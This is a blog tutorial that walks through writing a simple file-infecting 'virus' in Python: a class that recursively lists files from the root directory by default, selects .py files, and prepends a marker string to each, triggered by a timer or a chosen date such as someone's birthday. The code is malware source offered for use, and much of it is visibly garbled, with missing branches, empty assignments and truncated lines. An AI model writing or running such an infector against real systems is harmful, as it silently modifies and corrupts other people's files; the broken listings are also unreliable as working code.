Create a Simple Virus in Python

Create a Simple Virus in Python

By Pratyush Mishra


6 min read


Hi everyone👋, Sometimes we find our files infected with a computer virus. In this tutorial, we will get introduced to the concept of a virus by writing a simple one in Python.

First thing first, let’s get introduced to the definition of a computer virus. A virus is a typical malware program that infects a particular type of file or most files by injecting data or code. It tries to list files in all directories and then inject typical data/code in those files.

The point to be noted; a virus does not replicate itself. It just continuously infects all files in the directories/folders. The malware that replicates itself and consumes hard disk space is typically called a Worm.

You can refer to my YouTube video to see a working tutorial for better understanding and a step-by-step guide of the same.


To write a simple virus, we will use the following modules.

import os
import datetime
import pathlib
import time

os module

Here, module os is the most important one as it will help us to list all the files along with the absolute path. An absolute path starts with the root directory /.

An absolute path is necessary here as while working with numerous files you must know the exact location. Using filenames only, your script does not know where to look for that files.

pathlib module

Here, we use pathlib to retrieve the extension of a file. It can be done in multiple ways though, so you may not find this module necessary at all.

datetime and time

datetime and time is used only for the start time of execution. If you want the script to start working right now, you may not need these modules as well.

Virus Class

The initializer method

Now, lets create a virus class that accepts four arguments when it is called.

class Virus:

    def __init__(self, infect_string=None, path=None, \
                         extension=None, target_file_list=None):
        if isinstance(infect_string, type(None)):
            self.infect_string = "I am a Virus"
            self.infect_string = infect_string

        if isinstance(path, type(None)):
            self.path = "/"
            self.path = path

        if isinstance(extension, type(None)):
            self.extension = ".py"
            self.extension = extension

        if isinstance(target_file_list, type(None)):
            self.target_file_list = []
            self.target_file_list = target_file_list

Here, the infect_string will be used to insert a file. If the user does not provide input, the default value is “I am a Virus”.

By default, the path is set to be the root directory /. From here, it will browse all subdirectories and files. However, the user can provide a target path as well.

Users can define target file extensions . If not, the default is set to be python files .py .

The user can also provide the target_file_list that contains all the listed target files. If None, the constructor method set it as an empty list.

Btw, if you are wondering that why the code looks a bit ugly, you can use the following as well.

class Virus:

    def __init__(self, infect_string="I am a Virus", path="/", \
                         extension=".py", target_file_list=[]):
            self.infect_string = infect_string
            self.path = path
            self.extension = extension
            self.target_file_list = target_file_list

I just prefer the earlier way to set all default values inside the constructor method. However, the latter is a lot easier to understand and use.

Method to list all target files

here we use another method named list_files that lists all files within directories and subdirectories given an initial path.

    def list_files(self, path):
        files_in_current_directory = os.listdir(path)

        for file in  files_in_current_directory:
            # avoid hidden files/directories (start with dot (.))
            if not file.startswith('.'):
                # get the full path
                absolute_path = os.path.join(path, file)
                # check the extension
                file_extension = pathlib.Path(absolute_path).suffix

                # check if it is a directory
                if os.path.isdir(absolute_path):

                # check if the target file extension matches
                elif file_extension == self.extension:
                    is_infected = False
                    with open(absolute_path) as f:
                        for line in f:
                            if self.infect_string in line:
                                self.is_infected = True
                    if is_infected == False:

here, in the method we did the followings:

  1. list all files in the current working directory
  2. iterate over all files and do the followings

  3. only consider visible files (avoid hidden files, e.g., starts with dot . in Unix-based systems)

  4. get the absolute path using os.path.join

  5. retrieve the file extension using pathlib.Path

  6. check if it is a directory using os.path.isdir (if yes, call the same function and pass the path to continue digging deeper, in coding world it is called a recursive function)

  • Check if the extension matches with target extension (if yes, check whether it is already infected by looking for the string in the file; if string not found, append to the list).

Method to infect the files

Here, we will add another method that can infect (insert/prepend) the string in the given filename.

    def infect(self, file_abs_path):
        if os.path.basename(file_abs_path) != "":
                f = open(file_abs_path, 'r')
                data =
                virus = open(file_abs_path, 'w')
                virus.write(self.infect_string + "\n" + data )
            except Exception as e:

To prepend the self.infect_string, we first read the whole file and keep the contents in a variable data; then add our string before the data and write to the file.

point to be noted, in this example as we are using python files, we need to exclude our own file, right?

that’s why I exclude the filename there in the very first condition.

The final method that integrates everything

Now, we can first define when to start our virus.

  • Do you want to set a timer (e.g., 60 seconds), then provide input to the timer while calling this method.

  • Do you want to set a date (e.g., someone’s birthday), then provide input to the target_date while calling this method.

And, then our primary mission begins.

  • List all target files by calling the list_files method

  • For each file, insert the string using the infect method

okay, so, here is our code

    def start_virus_infections(self, timer=None, target_date=None):
        if not isinstance(timer, type(None)):
            for target in self.target_file_list:

        elif not isinstance(target_date, type(None)):
            today = str([:10]
            if str(target_date) == today:
                for target in self.target_file_list:

            print("User must provide either a timer or a date using")

Main Function

Now, let’s create our main function and run the code

if __name__ == "__main__":
    current_directory = os.path.abspath("")
    virus = Virus(path=current_directory)
    # virus.start_virus_infections(,6,1))
    # print(virus.target_file_list)

Here, we first create an object of the class. And then call the start_virus_infections method with providing a timer or a date. To avoid hassle, use os.path.abspath(""), which refers to the current directory only so that you do not get hurt with inserting the string in other necessary python codes you wrote before.


To have an easier testing environment, create a few python files in the same directory and check if your virus is able to insert the string to those files. To make things easier, run the following code to create three python files (create a separate script).

if __name__ == '__main__':
    filenames = ["", "", ""]
    data = 'print("hello")\n'

    for file in filenames:
        f = open(file, "w")

Alright, guys! I hope this article was helpful for you if it is the leave your comments below. I will meet you in another article until then KEEP CODING🤗.